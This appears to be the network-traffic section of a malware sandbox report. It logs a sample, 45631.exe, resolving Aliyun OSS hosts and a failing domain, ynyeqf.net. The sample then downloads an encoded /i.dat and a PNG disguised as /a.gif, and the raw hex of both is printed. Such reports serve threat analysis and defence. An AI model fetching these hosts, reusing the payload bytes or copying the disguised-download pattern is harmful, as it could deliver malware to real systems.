                                                  Jan 2, 2025 12:15:48.259040117 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.259171963 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.263940096 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.264065981 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.266258001 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.266365051 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.268827915 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.268930912 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.273679972 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.273782015 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.276041985 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.276160002 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.280994892 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.281091928 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.283457041 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.283552885 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.288386106 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.288585901 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.290709019 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.290810108 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.293945074 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.294024944 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.298176050 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.298266888 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.300616026 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.300685883 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.305322886 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.305394888 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.307815075 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.307908058 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.310269117 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.310332060 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.315237999 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.315299034 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.317656040 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.317722082 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.322566032 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.322674036 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.325021029 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.325109005 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.327641010 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.327727079 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.332279921 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.332407951 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.334925890 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.335009098 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.339785099 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.341718912 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.342319012 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.342443943 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.347078085 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.347165108 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.349529028 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.349620104 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.352124929 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.352231026 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.356878042 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.356986046 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.359252930 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.359337091 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.473613024 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.473692894 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.475807905 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.475879908 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.478133917 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.478193998 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.482547045 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.482615948 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.484778881 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.484920979 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.489211082 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.489299059 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.491372108 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.491430044 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.493549109 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.493619919 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.498027086 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.498090982 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.500236034 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.500313044 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:48.500318050 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.500412941 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.502001047 CET49997443192.168.2.6118.178.60.9
                                                  Jan 2, 2025 12:15:48.502028942 CET44349997118.178.60.9192.168.2.6
                                                  Jan 2, 2025 12:15:53.480891943 CET499998917192.168.2.68.217.152.240
                                                  Jan 2, 2025 12:15:53.485850096 CET8917499998.217.152.240192.168.2.6
                                                  Jan 2, 2025 12:15:53.485939026 CET499998917192.168.2.68.217.152.240
                                                  Jan 2, 2025 12:15:54.006747007 CET499998917192.168.2.68.217.152.240
                                                  Jan 2, 2025 12:15:54.011748075 CET8917499998.217.152.240192.168.2.6
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 2, 2025 12:14:02.865447998 CET5393353192.168.2.61.1.1.1
                                                  Jan 2, 2025 12:14:03.416198015 CET53539331.1.1.1192.168.2.6
                                                  Jan 2, 2025 12:15:13.525252104 CET4948053192.168.2.61.1.1.1
                                                  Jan 2, 2025 12:15:14.094238997 CET53494801.1.1.1192.168.2.6
                                                  Jan 2, 2025 12:15:52.358488083 CET5288753192.168.2.61.1.1.1
                                                  Jan 2, 2025 12:15:52.369460106 CET53528871.1.1.1192.168.2.6
                                                  Jan 2, 2025 12:15:58.445730925 CET5282153192.168.2.61.1.1.1
                                                  Jan 2, 2025 12:15:58.455236912 CET53528211.1.1.1192.168.2.6
                                                  Jan 2, 2025 12:16:04.476855993 CET5001553192.168.2.61.1.1.1
                                                  Jan 2, 2025 12:16:04.508176088 CET53500151.1.1.1192.168.2.6
                                                  Jan 2, 2025 12:16:10.539422035 CET5870553192.168.2.61.1.1.1
                                                  Jan 2, 2025 12:16:10.548959017 CET53587051.1.1.1192.168.2.6
                                                  Jan 2, 2025 12:16:16.570528984 CET5467153192.168.2.61.1.1.1
                                                  Jan 2, 2025 12:16:16.580475092 CET53546711.1.1.1192.168.2.6
                                                  Jan 2, 2025 12:16:23.226684093 CET5782853192.168.2.61.1.1.1
                                                  Jan 2, 2025 12:16:23.236310959 CET53578281.1.1.1192.168.2.6
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 2, 2025 12:14:02.865447998 CET192.168.2.61.1.1.10x9fb0Standard query (0)ry2ihs.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:15:13.525252104 CET192.168.2.61.1.1.10x91f2Standard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:15:52.358488083 CET192.168.2.61.1.1.10xc424Standard query (0)ynyeqf.netA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:15:58.445730925 CET192.168.2.61.1.1.10xbae6Standard query (0)ynyeqf.netA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:16:04.476855993 CET192.168.2.61.1.1.10xd326Standard query (0)ynyeqf.netA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:16:10.539422035 CET192.168.2.61.1.1.10xcb62Standard query (0)ynyeqf.netA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:16:16.570528984 CET192.168.2.61.1.1.10x6a42Standard query (0)ynyeqf.netA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:16:23.226684093 CET192.168.2.61.1.1.10x2faeStandard query (0)ynyeqf.netA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 2, 2025 12:14:03.416198015 CET1.1.1.1192.168.2.60x9fb0No error (0)ry2ihs.oss-cn-beijing.aliyuncs.comsc-2cuv.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 2, 2025 12:14:03.416198015 CET1.1.1.1192.168.2.60x9fb0No error (0)sc-2cuv.cn-beijing.oss-adns.aliyuncs.comsc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 2, 2025 12:14:03.416198015 CET1.1.1.1192.168.2.60x9fb0No error (0)sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.59A (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:15:14.094238997 CET1.1.1.1192.168.2.60x91f2No error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 2, 2025 12:15:14.094238997 CET1.1.1.1192.168.2.60x91f2No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 2, 2025 12:15:14.094238997 CET1.1.1.1192.168.2.60x91f2No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:15:52.369460106 CET1.1.1.1192.168.2.60xc424Name error (3)ynyeqf.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:15:58.455236912 CET1.1.1.1192.168.2.60xbae6Name error (3)ynyeqf.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:16:04.508176088 CET1.1.1.1192.168.2.60xd326Name error (3)ynyeqf.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:16:10.548959017 CET1.1.1.1192.168.2.60xcb62Name error (3)ynyeqf.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:16:16.580475092 CET1.1.1.1192.168.2.60x6a42Name error (3)ynyeqf.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 12:16:23.236310959 CET1.1.1.1192.168.2.60x2faeName error (3)ynyeqf.netnonenoneA (IP address)IN (0x0001)false
                                                  • ry2ihs.oss-cn-beijing.aliyuncs.com
                                                  • 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.64994639.103.20.594431656C:\Users\user\Desktop\45631.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:14:04 UTC111OUTGET /i.dat HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:14:05 UTC557INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:14:04 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 512
                                                  Connection: close
                                                  x-oss-request-id: 677674FCE80D013837AB1745
                                                  Accept-Ranges: bytes
                                                  ETag: "2CAD33745064F8D09878A5E2E439F0F8"
                                                  Last-Modified: Thu, 02 Jan 2025 10:14:48 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 1664869953454276110
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000113
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: LK0zdFBk+NCYeKXi5Dnw+A==
                                                  x-oss-server-time: 1
                                                  2025-01-02 11:14:05 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 42 49 02 59 31 2a 77 36 45 45 1b 55 3b 78 37 30 59 5a 59 5e 39 70 3f 32 5b 4b 47 5c 3f 2f 72 3f 50 52 10 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 15 1e 55 0e 66 7d 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 41 4a 01 5a 32 29 74 35 46 46 18 56 38 7b 34 33 5a 59 5a 5d 3a 73 3c 31 58 48 44 5f 3c 2c 71 3c 53 51 13 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 14 1f 54 0f 67 7c 21
                                                  Data Ascii: l%00BIY1*w6EEU;x70YZY^9p?2[KG\?/r?PR^p97888888888888888888888888888888888PLLH;rggUf} aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33AJZ2)t5FFV8{43ZYZ]:s<1XHD_<,q<SQ_q86999999999999999999999999999999999QMMI:sffTg|!


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.64995739.103.20.594431656C:\Users\user\Desktop\45631.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:14:06 UTC111OUTGET /a.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:14:06 UTC545INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:14:06 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 135589
                                                  Connection: close
                                                  x-oss-request-id: 677674FEF326DB3430D8B327
                                                  Accept-Ranges: bytes
                                                  ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                                  Last-Modified: Thu, 02 Jan 2025 10:14:14 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 8642451798640735006
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                                  x-oss-server-time: 1
                                                  2025-01-02 11:14:06 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-02 11:14:06 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                                                  Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                                  2025-01-02 11:14:06 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                                                  Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                                  2025-01-02 11:14:07 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                                  Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                  2025-01-02 11:14:07 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                                  Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                                  2025-01-02 11:14:07 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                                  Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                                  2025-01-02 11:14:07 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                                  Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                                  2025-01-02 11:14:07 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                                  Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
